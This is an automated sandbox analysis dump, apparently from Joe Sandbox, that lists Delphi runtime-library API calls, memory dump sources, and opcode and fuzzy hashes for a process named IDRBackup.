                                                                                                  • @Character@TCharacter@CheckSeparator$qqr26Character@TUnicodeCategory.RTL120 ref: 50011BE8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Character@$CategoryCheckInitialize$qqrvLatin1$qqrbSeparator$qqr26Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 1352756909-3916222277
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 500110D5
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 500110E7
                                                                                                    • Part of subcall function 5001062C: FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                    • Part of subcall function 5001062C: LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                    • Part of subcall function 5001062C: LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                  • @Character@TCharacter@CheckSeparator$qqr26Character@TUnicodeCategory.RTL120 ref: 50011120
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Character@$Error$qqrvLastRaiseResourceSysutils@$CategoryCheckFindInitialize$qqrvLatin1$qqrbLoadLockSeparator$qqr26Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 305751366-3916222277
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  APIs
                                                                                                  • @System@@GetMem$qqri.RTL120(?), ref: 5000C1A5
                                                                                                  • @System@@FillChar$qqrpvib.RTL120(?), ref: 5000C1D5
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(?), ref: 5000C1F5
                                                                                                  • @System@DynArrayClear$qqrrpvpv.RTL120 ref: 5000C200
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@$ArrayChar$qqrpvibClear$qqrrpvpvFillMem$qqriMove$qqrpxvpvi
                                                                                                  • String ID:
                                                                                                  • API String ID: 3421884137-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 50024D00: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50025040), ref: 50024D80
                                                                                                    • Part of subcall function 50024D00: @Sysutils@Trim$qqrx20System@UnicodeString.RTL120(?,00000000,50025040), ref: 50024D8B
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,50025B12), ref: 50025A96
                                                                                                  • @Sysutils@TryStrToTime$qqrx20System@UnicodeStringr16System@TDateTimerx24Sysutils@TFormatSettings.RTL120(?,00000000,50025B12), ref: 50025ACA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                    • Part of subcall function 500248EC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50024C6D), ref: 50024968
                                                                                                    • Part of subcall function 500248EC: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50024C6D), ref: 5002498C
                                                                                                    • Part of subcall function 500248EC: @Sysutils@Trim$qqrx20System@UnicodeString.RTL120(?,00000000,50024C6D), ref: 50024997
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50025A1C), ref: 500259AA
                                                                                                  • @Sysutils@TryStrToTime$qqrx20System@UnicodeStringr16System@TDateTime.RTL120(00000000,50025A1C), ref: 500259DA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@NewWideString$qqri.RTL120 ref: 50009B82
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 50009B99
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 50009BA9
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 50009BC7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                    • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                    • Part of subcall function 500243A4: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                    • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,500244C4), ref: 5002446D
                                                                                                    • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,500244C4), ref: 50024472
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,?,?,?,?,?,50004E31,00000064,50004D78,0000D7B1,?), ref: 50004DB9
                                                                                                  • @System@SetInOutRes$qqri.RTL120(?,?,?,00000000,?,?,?,?,?,50004E31,00000064,50004D78,0000D7B1,?), ref: 50004DBE
                                                                                                  • @System@SetInOutRes$qqri.RTL120(?,?,?,?,?,50004E31,00000064,50004D78,0000D7B1,?), ref: 50004E01
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                    • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                    • Part of subcall function 500243A4: @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                    • Part of subcall function 500243A4: @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500246CE), ref: 5002467C
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500246CE), ref: 500246A6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(?,?,?,?,?), ref: 50009E2E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @Math@IsZero$qqrxgg.RTL120(00000000,00000000,00000000,?,?,?), ref: 5001333F
                                                                                                  • @Math@SameValue$qqrxgxgg.RTL120(00000000,00000000,00000000,00000000,80000000,00003FFF,?,?,?,00000000,00000000,00000000,?,?,?), ref: 50013379
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Math@$SameValue$qqrxgxggZero$qqrxgg
                                                                                                  • String ID:
                                                                                                  • API String ID: 2598474148-0
                                                                                                  • Opcode ID: c5316efb0892469dfe6559604264221be66581b1a931cb23f285ec7ffa091242
                                                                                                  • Instruction ID: 8b6f4d4d102a9fe6760369e0e7593088a52b22f4b9c98d94c50d589b633ebce5
                                                                                                  • Opcode Fuzzy Hash: c5316efb0892469dfe6559604264221be66581b1a931cb23f285ec7ffa091242
                                                                                                  • Instruction Fuzzy Hash: 28110D70E48245B6EF315FA08C027AE7FA0AF01A10F208B4BFEF4A51D1DA724260C789
                                                                                                  APIs
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024767), ref: 50024741
                                                                                                    • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024767), ref: 50024746
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$StringSystem@System@@$AnsiEnsureFromInternalLen$qqrx20Str$qqrr20String$qqrr20Stringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 2906622797-0
                                                                                                  • Opcode ID: 9cab3a8bcc449554f3d38e26dfc2d9bd4fcf12d5c115a2b1dcda5b5b04b7de7d
                                                                                                  • Instruction ID: a635cd3dcb40994497b53f8fe6e6c41f0fe1daa708a8bd6d2e43c945e9681864
                                                                                                  • Opcode Fuzzy Hash: 9cab3a8bcc449554f3d38e26dfc2d9bd4fcf12d5c115a2b1dcda5b5b04b7de7d
                                                                                                  • Instruction Fuzzy Hash: AF01B13551F1D6AED7A1AFA0F8525EEB7E8EB13300BA106B6ED2082901D3649E00A251
                                                                                                  APIs
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120 ref: 5000D75A
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5000D766
                                                                                                    • Part of subcall function 50009C30: @System@@NewWideString$qqri.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C40
                                                                                                    • Part of subcall function 50009C30: @System@Move$qqrpxvpvi.RTL120(?,?,?,?,5000965D,?,?,?), ref: 50009C6E
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120 ref: 5000D7C6
                                                                                                  • @System@@WStrSetLength$qqrr17System@WideStringi.RTL120 ref: 5000D7D4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@Wide$ArrayLength$qqrr17Length$qqrvStringi$Move$qqrpxvpviString$qqri
                                                                                                  • String ID:
                                                                                                  • API String ID: 2943924986-0
                                                                                                  • Opcode ID: 085050b287510eb7b9789a4d6570b4c0541888048f5ea3701a0f565ec4d1815e
                                                                                                  • Instruction ID: 5542b4fa33d5804e65baac3af09d9e428f9e0197dd64d1a1656dc7895a855856
                                                                                                  • Opcode Fuzzy Hash: 085050b287510eb7b9789a4d6570b4c0541888048f5ea3701a0f565ec4d1815e
                                                                                                  • Instruction Fuzzy Hash: 4E01F9202149495FD3109F6DD8419ABB3E2EFE0311B40C23BF545C7229EAB49942C290
                                                                                                  APIs
                                                                                                  • @System@@NewWideString$qqri.RTL120 ref: 5000992F
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5000993E
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5000994E
                                                                                                  • @System@@WStrClr$qqrpv.RTL120 ref: 50009962
                                                                                                    • Part of subcall function 50009588: SysFreeString.OLEAUT32(?), ref: 50009596
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Move$qqrpxvpviSystem@System@@$Clr$qqrpvFreeStringString$qqriWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2700047326-0
                                                                                                  • Opcode ID: 2a90c5cc7be5839c9d2fdc1aa24c1342b383aaa77810758ece04b21b21fc663a
                                                                                                  • Instruction ID: 98f1936eb00471f73aa790e79a7215fb5c6e676163bb9629522c800d1bc1a43f
                                                                                                  • Opcode Fuzzy Hash: 2a90c5cc7be5839c9d2fdc1aa24c1342b383aaa77810758ece04b21b21fc663a
                                                                                                  • Instruction Fuzzy Hash: 1501F7313096454BAB14DA6DECA09AEB3D8DF90610B80033DFA84C7351EE20ED05C384
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 5001C2D3
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5001C348), ref: 5001C300
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @Sysutils@ByteType$qqrx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,5001C348), ref: 5001C31C
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5001C34F), ref: 5001C342
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$ByteClr$qqrpvInternalRef$qqrpvSysutils@T$us$i0$%iType$qqrx27
                                                                                                  • String ID:
                                                                                                  • API String ID: 3795063905-0
                                                                                                  • Opcode ID: 0090cee197739f04d46da03a3fbf7122e71953c6443ae2ffadc7c537a123e11b
                                                                                                  • Instruction ID: edce9a773ba6554bf0e1fbf5d896e20fbc1511fab1bfff3c5ce3298a0291d8fe
                                                                                                  • Opcode Fuzzy Hash: 0090cee197739f04d46da03a3fbf7122e71953c6443ae2ffadc7c537a123e11b
                                                                                                  • Instruction Fuzzy Hash: 47014C30704289EF9B11DEA9DE92C6EB3F8FB482107A18275E504D3251EB70EF80D655
                                                                                                  APIs
                                                                                                  • @System@UniqueString$qqrr20System@UnicodeString.RTL120 ref: 5000A53F
                                                                                                    • Part of subcall function 5000AAF8: @System@@NewUnicodeString$qqri.RTL120(?,5000A544), ref: 5000AAC6
                                                                                                    • Part of subcall function 5000AAF8: @System@Move$qqrpxvpvi.RTL120(00000000,?,5000A544), ref: 5000AAD7
                                                                                                    • Part of subcall function 5000AAF8: @System@@FreeMem$qqrpv.RTL120(?,5000A544), ref: 5000AAEC
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120 ref: 5000A559
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5000A593
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A59D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@Unicode$String$AnsiFromMove$qqrpxvpviStr$qqrr20Stringx27System@%T$us$i0$%$FreeInternalLength$qqrr20Mem$qqrpvString$qqriString$qqrr20StringiUnique
                                                                                                  • String ID:
                                                                                                  • API String ID: 2646382837-0
                                                                                                  • Opcode ID: c65559b3a43a539bc9f39b9396eb3fc635474360def7c2b98761288a201bb686
                                                                                                  • Instruction ID: 572ec78243513e6f1005ed345ec0839db98a53653f4091473b1bd5e8e29c749c
                                                                                                  • Opcode Fuzzy Hash: c65559b3a43a539bc9f39b9396eb3fc635474360def7c2b98761288a201bb686
                                                                                                  • Instruction Fuzzy Hash: E001DF317029624BAB109A3DDDA1559B3A6BFD6215394433AA506CB21EDA71CC0582C1
                                                                                                  APIs
                                                                                                  • @System@Random$qqrv.RTL120 ref: 500141DA
                                                                                                  • @System@Random$qqrv.RTL120 ref: 500141EF
                                                                                                  • @System@Ln$qqrxg.RTL120(?,?,?), ref: 5001422E
                                                                                                  • @System@Sqrt$qqrxg.RTL120 ref: 50014245
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@$Random$qqrv$Ln$qqrxgSqrt$qqrxg
                                                                                                  • String ID:
                                                                                                  • API String ID: 817724637-0
                                                                                                  • Opcode ID: a6d630325e0aea591bba7b45fbec38567b7a778495fcfedd49ce34c84d5982ca
                                                                                                  • Instruction ID: fbb615ccd8c33ff108ba09c26bee9e4f63df910d59be1be1ea666f5daae47871
                                                                                                  • Opcode Fuzzy Hash: a6d630325e0aea591bba7b45fbec38567b7a778495fcfedd49ce34c84d5982ca
                                                                                                  • Instruction Fuzzy Hash: 9D11A3A1E0E0A962DB5227B1FC254CD7F74EE52901B968B4BE8E160172E92344B0CB91
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(5850026B,5850026B,5850026B,A850017A), ref: 500122D7
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(5850026B,5850026B,5850026B,A850017A), ref: 500122E6
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(5850026B,5850026B,5850026B,A850017A), ref: 500122EB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$String$Except$qqrvException@$bctr$qqrx20LoadRaiseString$qqrp20System@@Sysutils@Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 486460785-0
                                                                                                  • Opcode ID: 7528642fe36d409ab37d41aa7cd802e04feb64ed356f621298a75c45d9c0b7a2
                                                                                                  • Instruction ID: 93523e8249dd9ce77bc6417ffb8b9f6d823e4069e3a6fe8b24fa869761cfaa76
                                                                                                  • Opcode Fuzzy Hash: 7528642fe36d409ab37d41aa7cd802e04feb64ed356f621298a75c45d9c0b7a2
                                                                                                  • Instruction Fuzzy Hash: 73014531108188AFE7219B54FD5285DBBE8EF11B00FA14A67F880C3121EA36AE20C691
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 50015D0B
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,50015D71), ref: 50015D38
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@LStrCopy$qqrv.RTL120(?,00000000,50015D71), ref: 50015D56
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(50015D78), ref: 50015D6B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiFromStr$qqrr27StringStringusSystem@System@%T$us$i0$%x20Unicode$Clr$qqrpvCopy$qqrvInternalRef$qqrpv
                                                                                                  • String ID:
                                                                                                  • API String ID: 189229420-0
                                                                                                  • Opcode ID: 2c5b7d96146a322dd601ddb1deb345cfb3d3b2af0608aa2e436bffa10a0899dc
                                                                                                  • Instruction ID: 021ebf48e049fbdcf8c921bc4b6c542263af2dc2d6db323e98c0c3942a0dd369
                                                                                                  • Opcode Fuzzy Hash: 2c5b7d96146a322dd601ddb1deb345cfb3d3b2af0608aa2e436bffa10a0899dc
                                                                                                  • Instruction Fuzzy Hash: 4101B130A04685EF9F11CFB8EDA289DB7F9EF482007A046B2E500D7244EB709E40CB90
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002D61B), ref: 5002D5E1
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002D61B), ref: 5002D5F4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20Internal
                                                                                                  • String ID:
                                                                                                  • API String ID: 4285912285-0
                                                                                                  • Opcode ID: b9cb69941f6bd798a715a23d18ccd4e8101779eda8d34779b1012db782d0a2da
                                                                                                  • Instruction ID: 2bb75f54c739022caca7f9861818caf256e2ce358085963fa9b364de837498d7
                                                                                                  • Opcode Fuzzy Hash: b9cb69941f6bd798a715a23d18ccd4e8101779eda8d34779b1012db782d0a2da
                                                                                                  • Instruction Fuzzy Hash: 0C01A230701A96EFAF01DFA8E9A1859B3F8EF4920079046B2E604D3311EB70EE01D650
                                                                                                  APIs
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,50015C25,?,?,?,?,00000000,00000000), ref: 50015BDC
                                                                                                    • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                    • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,00000000,50015C25,?,?,?,?,00000000,00000000), ref: 50015BF5
                                                                                                    • Part of subcall function 5000A464: @System@@UStrFromPCharLen$qqrr20System@UnicodeStringpci.RTL120(00000000,5000A525), ref: 5000A50A
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(?,?,?,?,?,00000000,50015C25,?,?,?,?,00000000,00000000), ref: 50015C05
                                                                                                    • Part of subcall function 5000A2B4: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A2FE
                                                                                                    • Part of subcall function 5000A2B4: @System@Move$qqrpxvpvi.RTL120(00000000,00000000), ref: 5000A357
                                                                                                    • Part of subcall function 5000A2B4: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A365
                                                                                                    • Part of subcall function 5000A2B4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A37A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@$Unicode$From$CharCopy$qqrx20Len$qqrr20StringStringii$AnsiAsg$qqrr20Clr$qqrpvInternalLength$qqrr20Move$qqrpxvpviN$qqrvStr$qqrr20StringiStringpbiStringpciStringx20Stringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 1635326871-0
                                                                                                  • Opcode ID: 8cb56cd88bb66136543759b54e723b42c2fdfd39fe3a5cbddfe58b74c9f845cd
                                                                                                  • Instruction ID: 01ec1028dada33f9320da5f488b3fc25f556a4d1c72985eefc9655cf80fcc98c
                                                                                                  • Opcode Fuzzy Hash: 8cb56cd88bb66136543759b54e723b42c2fdfd39fe3a5cbddfe58b74c9f845cd
                                                                                                  • Instruction Fuzzy Hash: 0D01F435200248BFEB018E98DC51F9ABBADEF8D320F608676B504D7782DA759E0086A0
                                                                                                  APIs
